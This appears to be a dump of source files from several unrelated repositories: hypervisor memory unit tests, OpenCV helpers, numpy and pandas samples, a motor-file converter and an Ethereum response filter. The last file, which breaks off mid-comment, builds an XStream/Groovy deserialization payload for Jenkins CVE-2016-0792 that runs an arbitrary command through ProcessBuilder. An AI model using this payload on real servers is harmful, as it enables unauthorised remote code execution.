(cls.CodeGva, 'rx'),
(cls.ReadOnlyGva, 'r'),
(cls.ReadWriteGva, 'rw'),
(cls.KernelPageGva, 'rwx'),
# Those VAs have the same PTE, and used to trigger a bug in the
# page table generation.
# PML4E=255, PDPTE=485, PDE=310, PTE=353.
(0x00007ff966d61000, 'r'),
# PML4E=255, PDPTE=485, PDE=337, PTE=353.
(0x00007ff96a361000, 'r'),
# PML4E=255, PDPTE=309, PDE=172, PTE=353
(0x0000014d55961000, 'r'),
# The goal with these is to have 2 contiguous pages in the virtual
# space but not in the host virtual space.
(cls.Page0Gva, 'rw'),
(cls.Page1Gva, 'rw')
]
cls.Policy = PackedPhysicalMemory()
cls.Partition = CreatePartition(cls.Pages, cls.Policy, cls.TebGva)
cls.Vp = cls.Partition.GetVp(0)
TranslationResult, cls.CodeHva = cls.Vp.TranslateGvaToHva(cls.CodeGva)
assert TranslationResult.value == hv.WHvTranslateGvaResultSuccess, 'The GVA->HVA translation should be a success'
cls.Snapshot = cls.Partition.Save()
def setUp(self):
'''Restore the context everytime before executing a test.'''
self.Partition.Restore(self.Snapshot)
def test_readwrite_unmapped(self):
'''Read from / to unmapped GVA.'''
self.assertFalse(self.Vp.WriteGva(
0,
'hello'
), 'The write to unmapped memory should fail.'
)
self.assertIsNone(self.Vp.ReadGva(
0,
0x1000
), 'The read to unmapped memory should fail.'
)
def test_writegva_cross_pages(self):
'''Read from and write to GVA space across two pages that are not contiguous
in the host virtual space.'''
TranslationResult, Hva0 = self.Vp.TranslateGvaToHva(self.Page0Gva)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The translation should succeed.'
)
self.assertIsNotNone(Hva0, 'The GVA->HVA translation should succeed.')
TranslationResult, Hva1 = self.Vp.TranslateGvaToHva(self.Page1Gva)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The translation should succeed.'
)
self.assertIsNotNone(Hva1, 'The GVA->HVA translation should succeed.')
self.assertNotEqual(
abs(Hva1 - Hva0), 0x1000,
'The two pages should not be contiguous in host virtual space.'
)
Content = 'hello friends!'
EndOffset = 0xff8
Address = self.Page0Gva + EndOffset
self.assertTrue(self.Vp.WriteGva(
Address,
Content
))
# The first 8 bytes are at the end of the first page.
First = ct.string_at(Hva0 + EndOffset, 8)
# The last 6 bytes are at the beginning of the second page.
Second = ct.string_at(Hva1, 6)
self.assertEqual(
First + Second, Content,
'The first and second bit should match the content.'
)
ReadContent = self.Vp.ReadGva(
self.Page0Gva + EndOffset,
len(Content)
)
self.assertEqual(
ReadContent, Content,
'The content should match.'
)
def test_snapshot_only_writeable(self):
'''Ensure that the snapshot only restores / track pages that are writeable.'''
ByteSaved = self.Vp.ReadGva(
self.ReadOnlyGva,
1
)
self.assertIsNotNone(ByteSaved, 'The ByteSaved should not be None.')
Snapshot = self.Partition.Save()
self.assertTrue(self.Vp.WriteGva(
self.ReadOnlyGva,
'\xAA',
Force = True
))
self.Partition.Restore(Snapshot)
ByteRead = self.Vp.ReadGva(
self.ReadOnlyGva,
1
)
self.assertNotEqual(
ByteSaved, ByteRead,
'The two bytes should not match, as read-only pages are not restored.'
)
# Restore the original byte as it will never get its original value back
# otherwise.
self.assertTrue(self.Vp.WriteGva(
self.ReadOnlyGva,
ByteSaved,
Force = True
))
def test_mapregion_translategpa(self):
'''Map a GPA range bigger than 0x1000 and ensure the GPA->HVA translation works
on every page of the region.'''
RegionSize = 5
RegionGpa = self.Policy.GetGpa(5)
HvaBase, SizeInBytes = self.Partition.MapGpaRange(
RegionGpa,
'hello',
'r'
)
for Offset in range(0, SizeInBytes, 0x1000):
CurHva = self.Partition.TranslateGpa(RegionGpa + Offset)
self.assertEqual(
CurHva, HvaBase + Offset,
'The two HVAs should match.'
)
def test_translate_gva_with_permcheck_kern(self):
'''Translate a GVA->GPA and validate page permissions against a kernel page.'''
TranslationResult, _ = self.Vp.TranslateGva(
self.KernelPageGva,
'r'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The kernel page should not be readable from cpl3.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.KernelPageGva,
're'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The kernel page should be translatable from cpl3 with PrivilegeExempt.'
)
def test_translate_gva_with_permcheck_rx(self):
'''Translate a GVA->GPA and validate page permissions against a rx page.'''
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'r'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The code page should be marked as readable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'w'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The code page should not be marked as writeable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'x'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The code page should be marked as executable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'rx'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The code page should be marked as rx in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.CodeGva,
'rwx'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The code page should not be marked as rwx in the page tables.'
)
def test_translate_gva_with_permcheck_ro(self):
'''Translate a GVA->GPA and validate page permissions against a read-only
page.'''
TranslationResult, _ = self.Vp.TranslateGva(
self.ReadOnlyGva,
'r'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The read-only page should be marked as readable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.ReadOnlyGva,
'w'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The read-only page should not be marked as writeable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.ReadOnlyGva,
'x'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The read-only page should not be marked as executable in the page tables.'
)
TranslationResult, _ = self.Vp.TranslateGva(
self.ReadOnlyGva,
'xe'
)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultPrivilegeViolation,
'The translation should still return a PrivilegeViolation even with WHvTranslateGvaFlagPrivilegeExempt.'
)
def test_clear_dirty_pages(self):
'''Clear the dirty bits of the pages.'''
Code = WriteMemory64(self.TebGva, 1) + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
self.Vp.Run()
DirtyGpas = self.Partition.QueryGpaRangeDirtyPages(
0,
len(self.Partition.TranslationTable) * 0x1000
)
TranslationResult, TebGpa = self.Vp.TranslateGva(self.TebGva)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The TEB GVA->GPA translation result (%s) must be a success.' % TranslationResult
)
self.assertEqual(
TebGpa in DirtyGpas, True,
'The TEB GPA should be dirty.'
)
self.Partition.ClearGpaRangeDirtyPages(
0,
len(self.Partition.TranslationTable) * 0x1000
)
Bits = self.Partition.QueryGpaRangeDirtyBitmap(
0,
len(self.Partition.TranslationTable) * 0x1000
)
for Bit in Bits:
self.assertEqual(
Bit, 0,
'Bit(%x) is expected to be cleared.' % Bit
)
def test_number_dirty_pages(self):
'''Count the number of bits returned for dirty pages.'''
Bits = self.Partition.QueryGpaRangeDirtyBitmap(
0,
len(self.Partition.TranslationTable) * 0x1000
)
self.assertEqual(
len(Bits), len(self.Partition.TranslationTable),
'The number of bits(%x) has to match the number of physical pages.' % len(Bits)
)
def test_read_from_noncanonical(self):
'''Read from a non canonical page.'''
NonCanonicalGva = 0xdeadbeefbaadc0de
Code = ReadMemory64(NonCanonicalGva)
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
ExitContext, _ = self.Vp.Run()
VpException = ExitContext.VpException
self.assertEqual(
VpException.ExceptionType, hv.WHvX64ExceptionTypeGeneralProtectionFault,
'A GeneralProtection exception(%x) is expected.' % VpException.ExceptionType
)
self.assertEqual(
# Error code: The General Protection Fault sets an error code,
# which is the segment selector index when the exception is segment related.
# Otherwise, 0.
VpException.ErrorCode, 0,
'The ErrorCode(%x) is expected to be 0.' % VpException.ErrorCode,
)
def test_read_from_nonpresent(self):
'''Read from a non-present page.'''
NonPresentGva = 1337
Code = ReadMemory64(NonPresentGva)
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
ExitContext, _ = self.Vp.Run()
VpException = ExitContext.VpException
self.assertEqual(
VpException.ExceptionType, hv.WHvX64ExceptionTypePageFault,
'A PageFault exception(%x) is expected.' % VpException.ExceptionType
)
self.assertEqual(
VpException.ErrorCode,
PF_ERRCODE_USER,
'The ErrorCode(%x) is expected to show a user-mode read of a non-present GVA.' % VpException.ErrorCode,
)
self.assertEqual(
VpException.ExceptionParameter, NonPresentGva,
'The ExceptionParameter(%x) should be the GVA of the non-present page.' % VpException.ExceptionParameter
)
def test_read_from_supervisor(self):
'''Read from supervisor memory.'''
Code = ReadMemory64(self.KernelPageGva) + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
ExitContext, _ = self.Vp.Run()
VpException = ExitContext.VpException
self.assertEqual(
VpException.ExceptionType, hv.WHvX64ExceptionTypePageFault,
'A PageFault exception(%x) is expected.' % VpException.ExceptionType
)
self.assertEqual(
VpException.ErrorCode,
PF_ERRCODE_PRESENT | PF_ERRCODE_USER,
'The ErrorCode(%x) is expected to show a user-mode read of a present supervisor page.' % VpException.ErrorCode,
)
self.assertEqual(
VpException.ExceptionParameter, self.KernelPageGva,
'The ExceptionParameter(%x) should be the GVA of the read-only page.' % VpException.ExceptionParameter
)
def test_execute_readonly(self):
'''Execute read-only memory.'''
Content = IncRax + Int3
self.assertTrue(self.Vp.WriteGva(
self.ReadOnlyGva,
Content,
Force = True
))
self.Vp.SetRip(self.ReadOnlyGva)
ExitContext, _ = self.Vp.Run()
VpException = ExitContext.VpException
self.assertEqual(
VpException.ExceptionType, hv.WHvX64ExceptionTypePageFault,
'A PageFault exception(%x) is expected.' % VpException.ExceptionType
)
self.assertEqual(
VpException.ErrorCode,
PF_ERRCODE_PRESENT | PF_ERRCODE_USER | PF_ERRCODE_IFETCH,
'The ErrorCode(%x) is expected to show an execute access.' % VpException.ErrorCode,
)
self.assertEqual(
VpException.ExceptionParameter, self.ReadOnlyGva,
'The ExceptionParameter(%x) should be the GVA of the read-only page.' % VpException.ExceptionParameter
)
def test_write_to_readonly(self):
'''Write to read-only memory.'''
Value = 0xdeadbeefbaadc0de
Content = struct.pack('<Q', Value)
self.assertTrue(self.Vp.WriteGva(
self.ReadOnlyGva,
Content,
Force = True
))
Code = WriteMemory64(self.ReadOnlyGva, Value) + Int3
self.assertTrue(self.Vp.WriteGva(
self.CodeGva,
Code,
Force = True
))
self.Vp.SetRip(self.CodeGva)
ExitContext, _ = self.Vp.Run()
VpException = ExitContext.VpException
self.assertEqual(
VpException.ExceptionType, hv.WHvX64ExceptionTypePageFault,
'A PageFault exception(%x) is expected.' % VpException.ExceptionType
)
self.assertEqual(
VpException.ErrorCode,
PF_ERRCODE_PRESENT | PF_ERRCODE_USER | PF_ERRCODE_WRITE,
'The ErrorCode(%x) is expected to show a write access.' % VpException.ErrorCode,
)
self.assertEqual(
VpException.ExceptionParameter, self.ReadOnlyGva,
'The ExceptionParameter(%x) should be the GVA of the read-only page.' % VpException.ExceptionParameter
)
def test_read_from_readonly(self):
'''Read from read-only memory.'''
Value = 0xdeadbeefbaadc0de
Content = struct.pack('<Q', Value)
self.assertTrue(self.Vp.WriteGva(
self.ReadOnlyGva,
Content,
Force = True
))
Code = ReadMemory64(self.ReadOnlyGva) + Int3
self.assertTrue(self.Vp.WriteGva(
self.CodeGva,
Code,
Force = True
))
self.Vp.SetRip(self.CodeGva)
ExitContext, _ = self.Vp.Run()
Rax = self.Vp.GetRegister64(hv.Rax)
self.assertEqual(
Rax, Value,
'@rax(%x) is supposed to have the expected value' % Rax
)
def test_read_from_gs(self):
'''Read memory from the GS segment.'''
TebValue = 0xdeadbeefbaadc0de
TebContent = struct.pack('<Q', TebValue)
self.assertTrue(self.Vp.WriteGva(
self.TebGva,
TebContent
))
Code = LoadGsInRax + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
ExitContext, _ = self.Vp.Run()
Rax = self.Vp.GetRegister64(hv.Rax)
self.assertEqual(
Rax, TebValue,
'@rax(%x) is supposed to have the expected Teb value' % Rax
)
def test_gva_translations(self):
'''Run GVA translations on the partition.'''
Gpas = []
for Gva, _ in self.Pages:
ResultCode, Gpa = self.Vp.TranslateGva(Gva)
self.assertEqual(
ResultCode.value, hv.WHvTranslateGvaResultSuccess,
'TranslateGva(%x) returned %s.' % (Gva, ResultCode)
)
Gpas.append(Gpa)
self.assertEqual(
len(set(Gpas)), len(Gpas),
'Every GVA should map to a unique GPA'
)
def test_simple_user(self):
'''Run a bunch of 'inc rax' followed by an 'int3' which we should get
a VMEXIT for, and then step over and execute another 'inc rax' followed by
an 'int3' and get one last VMEXIT.'''
CodeGva = self.CodeGva
N = 137
Code = ''
# inc rax ; ... ; inc rax
Code += IncRax * N
# Compute the expected @rip at the first vmexit before we add the rest of the
# code. This is used for testing everything is going as expected.
ExpectedRip1 = CodeGva + len(Code)
# int3. This is where the first vmexit we should get. We will skip over the
# instruction and continue.
Code += Int3
Code += IncRax
ExpectedRip2 = CodeGva + len(Code)
# int3. This is the second vmexit we should get.
Code += Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(CodeGva)
ExitContext, ExitReason = self.Vp.Run()
Rip, Rax = self.Vp.GetRegisters64(
hv.Rip,
hv.Rax
)
ExpectedRax = N
self.assertEqual(
Rax, N,
'@rax(%x) does not match the magic value.' % Rax
)
self.assertEqual(
Rip, ExpectedRip1,
'@rip(%x) does not match the end @rip.' % Rip
)
self.assertEqual(
ExitReason.value, hv.WHvRunVpExitReasonException,
'An exception VMEXIT is expected when the int3 is triggered.'
)
self.assertEqual(
ExitContext.VpException.ExceptionType, hv.WHvX64ExceptionTypeBreakpointTrap,
'A breakpoint exception is expected.'
)
VpContext = ExitContext.VpContext
self.assertEqual(
VpContext.InstructionLength, len(Int3),
'The instruction length(%x) is supposed to be 1.' % VpContext.InstructionLength
)
# Successfully caught the first int3 interruption, stepping over it.
self.Vp.SetRip(Rip + len(Int3))
ExitContext, ExitReason = self.Vp.Run()
Rip, Rax = self.Vp.GetRegisters64(
hv.Rip,
hv.Rax
)
ExpectedRax += 1
self.assertEqual(
Rax, ExpectedRax,
'@rax(%x) does not match the magic value.' % Rax
)
self.assertEqual(
Rip, ExpectedRip2,
'@rip(%x) does not match the end @rip.' % Rip
)
self.assertEqual(
ExitReason.value, hv.WHvRunVpExitReasonException,
'An exception VMEXIT is expected when the int3 is triggered.'
)
self.assertEqual(
ExitContext.VpException.ExceptionType, hv.WHvX64ExceptionTypeBreakpointTrap,
'A breakpoint exception is expected.'
)
VpContext = ExitContext.VpContext
self.assertEqual(
VpContext.InstructionLength, len(Int3),
'The instruction length(%x) is supposed to be 1.' % VpContext.InstructionLength
)
def test_partition_counters(self):
'''Check the WHvPartitionCounterSetMemory partition performance counter.'''
MemoryCounters = self.Partition.GetPartitionCounters(
hv.WHvPartitionCounterSetMemory
)
self.assertEqual(
MemoryCounters.Mapped1GPageCount, 0,
'There should not be any 1GB pages.'
)
self.assertEqual(
MemoryCounters.Mapped2MPageCount, 0,
'There should not be any 2MB pages.'
)
PageCount = 24
self.assertGreaterEqual(
MemoryCounters.Mapped4KPageCount, PageCount,
'There should be at least %d 4KB pages.' % PageCount
)
def test_vp_counters(self):
'''Check the processor performance counters.'''
# XXX: They don't look right?
pass
def test_save_restore_registers(self):
'''Take a snapshot modify registers and restore it.'''
self.Vp.SetRegisters({
hv.Rax : 0xdeadbeefbaadc0de,
hv.Rbx : 0xdeadbeefbaadc0de,
hv.Rcx : 0xdeadbeefbaadc0de,
hv.Rip : 0xdeadbeefbaadc0de,
hv.Rsp : 0xdeadbeefbaadc0de
})
Snapshot = self.Partition.Save()
InitRax = self.Vp.GetRegister64(hv.Rax)
self.Vp.SetRegister(hv.Rax, 0xaaaaaaaaaaaaaaaa)
self.Partition.Restore(Snapshot)
Rax = self.Vp.GetRegister64(hv.Rax)
self.assertEqual(
Rax, InitRax,
'@rax(%x) does not match the value it had before the snapshot.' % Rax
)
def test_save_restore_memory(self):
'''Take a snapshot modify memory and restore it.'''
TebContent = '\xaa' * 8
self.assertTrue(self.Vp.WriteGva(
self.TebGva,
TebContent
))
Snapshot = self.Partition.Save()
Code = WriteMemory64(self.TebGva, 0xbbbbbbbbbbbbbbbb) + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
self.Vp.Run()
self.assertEqual(self.Vp.ReadGva(
self.TebGva,
8
), '\xbb' * 8,
'The TEB is expected to contain bbs.'
)
self.Partition.Restore(Snapshot)
Code = ReadMemory64(self.TebGva) + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
self.Vp.Run()
Rax = self.Vp.GetRegister64(hv.Rax)
self.assertEqual(
Rax, 0xaaaaaaaaaaaaaaaa,
'@rax(%x) is supposed to have the value restored by the snapshot.' % Rax
)
def test_save_restore_gpa_to_hva(self):
'''Ensure that the translation table is saved in a snapshot.'''
TranslationTable = self.Partition.GetTranslationTable()
Snapshot = self.Partition.Save()
PageGpa = self.Policy.GetGpa()
Hva, Size = self.Partition.MapGpaRange(
PageGpa,
'hello',
'r'
)
self.assertEqual(
Size, 0x1000,
'The size(%x) is expected to be a page large.' % Size
)
self.assertEqual(
PageGpa in self.Partition.TranslationTable, True,
'The GPA(%x) is expected to be added to the translation table.' % PageGpa
)
self.assertEqual(
self.Partition.TranslationTable != TranslationTable,
True,
'The translation tables are expected to be different.'
)
self.Partition.Restore(Snapshot)
self.assertEqual(
PageGpa not in self.Partition.TranslationTable, True,
'The GPA(%x) is expected to not be in the translation table anymore.' % PageGpa
)
self.Partition.UnmapGpaRange(
PageGpa,
0x1000,
Hva
)
self.assertEqual(
self.Partition.TranslationTable, TranslationTable,
'The translation tables are expected to match again after the unmap.'
)
def test_save_restore_dirty_pages(self):
'''Ensure that a dirty page is turned non dirty after a snapshot. Also ensure
that on restore it keeps non dirty.'''
# Let's make sure the TEB page is clean.
TranslationResult, TebGpa = self.Vp.TranslateGva(self.TebGva)
self.assertEqual(
TranslationResult.value,
hv.WHvTranslateGvaResultSuccess,
'The TEB GVA->GPA translation result(%s) must be a success.' % TranslationResult
)
Dirty = self.Partition.IsGpaDirty(TebGpa)
self.assertEqual(
Dirty, False,
'The TEB page is expected to be clean.'
)
# Dirty the TEB page.
Code = WriteMemory64(self.TebGva, 1) + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
self.Vp.Run()
# Ensure the page is dirty.
Dirty = self.Partition.IsGpaDirty(TebGpa)
self.assertEqual(
Dirty, True,
'The TEB page is expected to be dirty.'
)
# Grab a snapshot.
Snapshot = self.Partition.Save()
# Make sure the page is clean again.
Dirty = self.Partition.IsGpaDirty(TebGpa)
self.assertEqual(
Dirty, False,
'The TEB page is expected to be clean after snapshot.'
)
# Dirty the TEB page.
Code = WriteMemory64(self.TebGva, 1) + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
self.Vp.Run()
# Ensure the page is dirty.
Dirty = self.Partition.IsGpaDirty(TebGpa)
self.assertEqual(
Dirty, True,
'The TEB page is expected to be dirty.'
)
# Restore the snapshot.
self.Partition.Restore(Snapshot)
# Ensure the page is back clear again.
Dirty = self.Partition.IsGpaDirty(TebGpa)
self.assertEqual(
Dirty, False,
'The TEB page is expected to be clean after restore.'
)
def main(argc, argv):
HypervisorPresent = hv.IsHypervisorPresent()
print 'HypervisorPresent:', HypervisorPresent
if not HypervisorPresent:
return 1
unittest.main(verbosity = 2)
return 0
if __name__ == '__main__':
sys.exit(main(len(sys.argv), sys.argv))
``` |
{
"source": "0versun/telega_moto",
"score": 4
} |
#### File: telega_moto/data/timing_processor.py
```python
import datetime
def return_dif(target_year, target_month, target_day):
'''Return days until the target date, or a message if it is today or has passed.'''
today = datetime.date.today()
target = datetime.date(int(target_year), int(target_month), int(target_day))
if target < today:
output_day = today - target
print('This date has already come and gone', output_day.days)
return 'none at all, this date has already come and gone'
elif target == today:
return 'none at all, because this day is today'
else:
output_day = target - today
return output_day.days
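# Illustrative usage (a sketch; the dates are hypothetical). Note the mixed
# return types: an int day count for future dates, a message string otherwise.
#   return_dif(2099, 12, 31)  # -> days remaining, as an int
#   return_dif(2000, 1, 1)    # -> 'none at all, this date has already come and gone'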
``` |
{
"source": "0w1Gr3y/MOT_ByteTrack",
"score": 3
} |
#### File: 0w1Gr3y/MOT_ByteTrack/utils.py
```python
import numpy as np
import cv2 as cv
def resize_image(image, new_size=(-1, 400), interpolation=cv.INTER_LINEAR):
'''
:param image: input image
:param new_size: (width, height) or (-1, h) or (w, -1)
:param interpolation: opencv cv.INTER_* flag
:return: resized image
'''
image_size = (image.shape[1], image.shape[0])
if new_size[0] == -1:
image_size_new = (int(image_size[0] * new_size[1] / image_size[1]), new_size[1])
elif new_size[1] == -1:
image_size_new = (new_size[0], int(image_size[1] * new_size[0] / image_size[0]))
else:
image_size_new = new_size  # new_size is already (width, height)
return cv.resize(image, image_size_new, interpolation=interpolation)
def show_image(image_name, image, new_size=(-1, 400)):
'''
:param image_name: image window name
:param image: input image
:param new_size: (width, height) or (-1, h) or (w, -1)
:return:
'''
image_show = resize_image(image, new_size)
cv.imshow(image_name, image_show)
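# Illustrative usage (a sketch; 'frame.jpg' is a hypothetical file):
#   img = cv.imread('frame.jpg')
#   small = resize_image(img, new_size=(-1, 400))  # keep aspect ratio, height 400
#   show_image('preview', img)  # displays a 400px-high copy; follow with cv.waitKey()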
```
#### File: 0w1Gr3y/MOT_ByteTrack/VideoPlayer.py
```python
import cv2 as cv
class VideoPlayer:
def __init__(self, video_path):
self.video_path = video_path
self.video_cap = cv.VideoCapture(video_path)
if not self.video_cap.isOpened():
print("Error opening video stream or file")
self.video_cap = None
return
self.fps = int(self.video_cap.get(cv.CAP_PROP_FPS))
self.cv_wait_time = int(1000 / self.fps)
self.width = int(self.video_cap.get(cv.CAP_PROP_FRAME_WIDTH))
self.height = int(self.video_cap.get(cv.CAP_PROP_FRAME_HEIGHT))
print('inited video capture \"{}\" | FPS: {} | Resolution: {}x{}'.format(video_path, self.fps,
self.video_cap.get(
cv.CAP_PROP_FRAME_WIDTH),
self.video_cap.get(
cv.CAP_PROP_FRAME_HEIGHT)))
def get_frame(self):
ret, frame = self.video_cap.read()
return ret, frame
def reset(self):
self.video_cap.release()
self.video_cap = cv.VideoCapture(self.video_path)
def __del__(self):
if self.video_cap is not None:
self.video_cap.release()
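# Illustrative usage (a sketch; 'clip.mp4' is a hypothetical path):
#   player = VideoPlayer('clip.mp4')
#   ok, frame = player.get_frame()
#   while ok:
#       cv.imshow('video', frame)
#       if cv.waitKey(player.cv_wait_time) & 0xFF == ord('q'):
#           break
#       ok, frame = player.get_frame()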
``` |
{
"source": "0w8States/Drive-Manager-2-Utilites",
"score": 3
} |
#### File: 0w8States/Drive-Manager-2-Utilites/main.py
```python
IMPORT_PATH = "./motor-parameter-files/"
#Directory where to export the DM2 files
EXPORT_PATH = ""
#Path for DM2 XML Templates
XML_TEMPLATES = "./XML_Templates/"
import os
from DM2 import MotorUtility
import traceback
import logging
#Walk the OS path for any files in the directory or sub-directories
def ccm_folder_walk(IMPORT_PATH):
filelist = []
for root, dirs, files in os.walk(IMPORT_PATH):
for file in files:
if file[-4:] == ".ccm":
#Append the file name to the list
filelist.append(os.path.join(root,file))
return filelist
def main():
#Create and EL7411 Object
dm2motor = MotorUtility()
#Mass Import Routine
filelist = ccm_folder_walk(IMPORT_PATH)
print(f"Now Importing {len(filelist)} Motor Files...")
dc_motor_count = 0
ac_motor_count = 0
for file in filelist:
try:
dm2motor.import_ccm_motordata(file)
#You can print the motor data for each file like this
#print(el7411.get_motor_data())
if dm2motor.IsAc == "false":
dm2motor.export_EL7411_dmmotor(EXPORT_PATH)
dc_motor_count += 1
except Exception as e:
print("On File:", file)
logging.error(traceback.format_exc())
# Logs the error appropriately.
print(f"Number of DC Motors Exported: {dc_motor_count}")
print(f"Number of AC Motors Exported: {ac_motor_count}")
if __name__ == '__main__':
main()
``` |
{
"source": "0w8States/numpy-stack-samples",
"score": 4
} |
#### File: numpy-stack-samples/numpy/matrix-dot-speed.py
```python
import numpy as np
from datetime import datetime
# note: you can also use %timeit
a = np.random.randn(100)
b = np.random.randn(100)
T = 100000
def slow_dot_product(a, b):
result = 0
for e, f in zip(a, b):
result += e*f
return result
t0 = datetime.now()
for t in range(T):
slow_dot_product(a, b)
dt1 = datetime.now() - t0
t0 = datetime.now()
for t in range(T):
a.dot(b)
dt2 = datetime.now() - t0
print("Time for slow method:", dt1.total_seconds())
print("Time for fast method:", dt2.total_seconds())
print("(slow / fast) Factor:", dt1.total_seconds() / dt2.total_seconds())
```
#### File: numpy-stack-samples/pandas/donut-dataset.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plot
# Function to generate datapoints
def create_donut(radius, size):
# assume that arr is in polar coordinates
arr = np.array([np.linspace(0, 2 * np.pi, size), np.random.randn(size)]).T + radius
cartesian_arr = np.array([arr[:, 1] * np.cos(arr[:, 0]), arr[:, 1] * np.sin(arr[:, 0])]).T
return cartesian_arr
# Function to square values
def square_x1(row):
return float(row['x1']**2)  # square the x1 feature
def square_x2(row):
return float(row['x2']**2)  # square the x2 feature
# Function to multiply values
def multiply_x1x2(row):
return float(row['x1'] * row['x2'])  # interaction term x1 * x2
# Generate numpy arrays
outerCircle = create_donut(10, 5000)
innerCircle = create_donut(5, 5000)
# Outer donut dataframe
dfo = pd.DataFrame(outerCircle, columns=["x1", "x2"])
dfo["y"] = 1
# Inner donut dataframe
dfi = pd.DataFrame(innerCircle, columns=["x1", "x2"])
dfi["y"] = 0
# Generate DataFrame for result csv
df = pd.concat([dfi, dfo], ignore_index=True)
# Apply quadratic feature expansion
df["x1^2"] = df.apply(square_x1, axis=1)
df["x2^2"] = df.apply(square_x2, axis=1)
df["x1*x2"] = df.apply(multiply_x1x2, axis=1)
# Rearrange columns
df = df[["x1", "x2", "x1^2", "x2^2", "x1*x2", "y"]]
# (Optional) Shuffle to mix up "y" values
# df = df.sample(frac=1.0)
# Export to CSV
df.to_csv("result.csv", header=True, index=False)
# Plot
ax = dfo.plot(x=0, y=1, kind="scatter", color="blue")
dfi.plot(x=0, y=1, kind="scatter", color="red", ax=ax, figsize=(15, 15), legend=False)
plot.show()
``` |
{
"source": "0x0000002A/eth_spider",
"score": 3
} |
#### File: eth_spider/utils/filter.py
```python
import json
import os
import settings
#todo move to file*.py
class FilterAppendRule(object):
# decoder encoder todo
# switch selector/parser automatically todo
def json_dict_parse(self, string):
#from json to dict
return json.loads(string)
def dict_selector(self, current_dict, element_list):
selected_dict = {}  # start with an empty dict, not the dict type itself
if len(element_list) != 0:
selected_dict = dict((key, current_dict[key]) for key in element_list if key in current_dict)
current_dict = selected_dict
return selected_dict
def html_selector(self, html, elements):
pass
def dict_value_to_string_parse(self,current_dict,sep=","):
value_list = []
for key,value in current_dict.items():
value_list.append(value)
return sep.join(value_list)
def dict_key_to_string_parse(self,current_dict,sep=","):
key_list = []
for key,value in current_dict.items():
key_list.append(key)
return sep.join(key_list)
class ImplFilter:
def __init__(self, content):
self.append_rule = FilterAppendRule
#input content
self.content_raw = content
self.selected_elements = []
def eth_api_reponse_filter(self):
# todo to create a eth_api layer
self.content_dict = self.append_rule.json_dict_parse(self.append_rule, self.content_raw)
self.append_rule.dict_selector(self.append_rule, self.content_dict, ["result"])
# todo should be adaptable for multiple types of "result"
self.content_result_list = self.content_dict["result"]
if type(self.content_result_list) != list:
pass #exception
if type(self.content_result_list[0]) != dict:
pass # raise "error"
for line in self.content_result_list:
self.append_rule.dict_selector(self.append_rule, line, self.selected_elements)
def eth_api_response_storage_filter(self):
# todo move to filter combining the file/storage type
if type(self.content_result_list) != list:
pass #exception
if type(self.content_result_list[0]) != dict:
pass # raise "error"
# todo combining file type
self.file_content = ""
line = ""
header = ""
if len(self.content_result_list) > 0:
header = self.append_rule.dict_key_to_string_parse(self.append_rule, self.content_result_list[0])
for line_dict in self.content_result_list:
line = self.append_rule.dict_value_to_string_parse(self.append_rule, line_dict)
self.file_content = self.file_content + line + settings.LINESEP
self.file_content = header + settings.LINESEP + self.file_content
``` |
{
"source": "0x00-0x00/jenkins-cve-2016-0792",
"score": 3
} |
#### File: 0x00-0x00/jenkins-cve-2016-0792/prepare_payload.py
```python
def prepare_payload(command):
splitCommand = command.split()
preparedCommands = ''
for entry in splitCommand:
preparedCommands += f'<string>{entry}</string>'
xml = f'''
<map>
<entry>
<groovy.util.Expando>
<expandoProperties>
<entry>
<string>hashCode</string>
<org.codehaus.groovy.runtime.MethodClosure>
<delegate class="groovy.util.Expando"/>
<owner class="java.lang.ProcessBuilder">
<command>{preparedCommands}</command>
</owner>
<method>start</method>
</org.codehaus.groovy.runtime.MethodClosure>
</entry>
</expandoProperties>
</groovy.util.Expando>
<int>1</int>
</entry>
</map>'''
return xml
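# Illustrative usage (a sketch; the command is hypothetical). The returned XML
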